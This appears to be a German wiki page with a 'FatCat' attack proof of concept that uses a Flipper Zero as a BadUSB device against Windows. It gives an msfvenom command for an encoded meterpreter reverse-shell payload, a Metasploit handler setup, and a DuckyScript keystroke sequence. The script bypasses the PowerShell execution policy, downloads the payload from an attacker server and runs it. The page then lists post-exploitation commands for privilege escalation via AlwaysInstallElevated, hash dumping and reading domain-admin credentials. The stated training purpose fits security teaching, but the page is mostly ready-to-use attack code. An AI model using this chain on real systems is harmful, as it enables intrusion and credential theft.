Inhaltsverzeichnis

, , ,

FatCat Attack PoC

 _____     _    ____      _
|  ___|_ _| |_ / ___|__ _| |_
| |_ / _` | __| |   / _` | __|
|  _| (_| | |_| |__| (_| | |_
|_|  \__,_|\__|\____\__,_|\__|
Attack PoC
This PoC is for demonstration and training purposes only - misuse is prohibited. strafbar1)

Description

The objective is to extract relevant SAM data from the registry. For this purpose, the flipper is used as a BadUSB device. The PowerShell Execution Policy is to be bypassed and the required rights are to be secured with a privilege escalation. The following data is to be exfiltrated:

User Password Hash
Host \ User
Host \ Admin
Domain \ Admin



Procedure

  1. Deactivate AV
  2. Create payload
  3. Start handler
  4. BadUSB attack
  5. Use RemoteShell to explore
  6. Search for exploit
  7. Apply exploit
  8. Collect credentials



Documentation

Attack Chain Step Attack Technique Attack Tool
Weaponisation Exploit, Payload msfvenom2)
Delivery Physical access, Injection Flipper3), BadUSB4)
Bypass PowerShell Restrictions5)
Exploitation Reverse Shell Metasploit6)
Enumeration Enumerate System Info JAWS7), SessionGopher8), weak Service Permissions9), Primary Access Token Manipulation10), Unquoted Service Path 11), PassTheHash 12) 13), BetterSafetyKatz (Builds local, obfuscating not complete), Search for local Exploits14)
Privilege Escalation15) AlwaysInstallElevated 16)
Actions on Objectives Exfiltration Exfiltrate Data



Preparations and attack

Metasploit payload

cmd
msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.2.77 LPORT=50666 -e x86/shikata_ga_nai -i 5 -f exe > msfpayload.exe
exit


Generate payload


Metasploit Handler

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.77
set LPORT 50666
exploit


Configure and start Metasploit Handler


Access to the target system

WINDOWS r
DELAY 2000
STRING powershell.exe
DELAY 3000
ENTER
DELAY 5000
STRING Set-ExecutionPolicy Bypass -Scope Process -force
DELAY 3000
ENTER
DELAY 3000
STRING irm https://<DEIN-COOLER-WEBSERVER>/msfpayload.exe -OutFile msfpayload.exe
DELAY 3000
ENTER
DELAY 5000
STRING Start-Process msfpayload.exe
DELAY 3000
ENTER
DELAY 3000
STRING exit
DELAY 1500
ENTER


Flipper attack is executed


Connection established - Metasploit does it

getsystem
hashdump
ls
getwd
cd c:
cd Glob_Share
ls
background
use post/multi/recon/local_exploit_suggester
sessions
set session 1
run
use exploit/windows/local/always_install_elevated
set session 1
exploit
cd glob_share
type Domain-Admin-Creds.txt
hashdump
sessions -i 1
Meterpreter Session produced
Automated Exploit Search for Privilege Escalation
Privilege Escalation successful
Here are our searched credentials
1)
https://dejure.org/gesetze/StGB/202a.html
2)
https://github.com/ksanchezcld/Hacking_Cheat_Sheet/blob/master/msfvenom
3)
https://flipperzero.one/
4)
https://grantonline.medium.com/flipper-zero-badusb-getting-started-with-duckyscript-f212fcdd5dec
5)
https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/
6)
https://www.hackers-arise.com/post/2017/07/31/metasploit-basics-part-9-using-msfvenom-to-create-custom-payloads
7)
https://github.com/411Hall/JAWS
8)
https://github.com/Arvanaghi/SessionGopher
9)
https://fuzzysecurity.com/tutorials/16.html
10)
https://www.ired.team/offensive-security/privilege-escalation/t1134-access-token-manipulation
11)
https://www.ired.team/offensive-security/privilege-escalation/unquoted-service-paths
12)
https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/README.md
13)
https://www.ired.team/offensive-security/privilege-escalation/pass-the-hash-privilege-escalation-with-invoke-wmiexec
14)
https://null-byte.wonderhowto.com/how-to/get-root-with-metasploits-local-exploit-suggester-0199463/
15)
https://github.com/frizb/Windows-Privilege-Escalation
16)
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated